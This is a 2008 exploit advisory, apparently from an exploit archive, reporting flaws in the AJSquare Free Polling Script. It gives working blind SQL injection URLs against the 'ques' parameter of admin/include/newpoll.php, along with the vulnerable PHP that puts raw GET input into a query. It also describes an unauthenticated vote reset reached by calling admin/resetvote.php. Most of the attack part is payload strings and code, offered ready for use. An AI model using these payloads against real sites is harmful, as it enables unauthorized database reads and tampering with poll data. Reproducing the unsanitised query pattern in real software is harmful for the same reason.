freepolling-sql.txt
Posted on 11 November 2008
============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ \_ |_____| |_____| /_/ \_ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | | | / _ | |/ / | | _ | || |_ | | | | | | | | ' / | |_| | |__ _| | | | | |_| | | . \n\____| |_| |_| \_| \___/ |_|\_\n ============================================================================== AJSquare Free Polling Script (DB) Multiple Vulnerabilities ============================================================================== [»] Script: [ AJSquare Free Polling Script DataBase Version ] [»] Language: [ PHP ] [»] Website: [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ] [»] Type: [ Free ] [»] Report-Date: [ 10.11.2008 ] [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] ===[ XPL ]=== [1][!] Blind SQLi (MQ = off) [»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/* True [»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/* False [../admin/include/newpoll.php] <?php require 'connect.php'; $ques = $_GET[ques]; $total = $_GET[total]; for($i=1;$i<=$total;$i++) { $val[] = array($_GET["val".$i]); } $sqlnew = "select * from newpoll where question='$ques'"; $resnew = mysql_query($sqlnew); [../admin/include/newpoll.php] [2][!] Reset Votes - Just call resetvote.php ;) [»] http://127.0.0.1/[path]/admin/resetvote.php ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 <Tornado2800[at]gmail.com> [»] Hussain-X <darkangel_g85[at]yahoo.com> //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); ===============================================================================
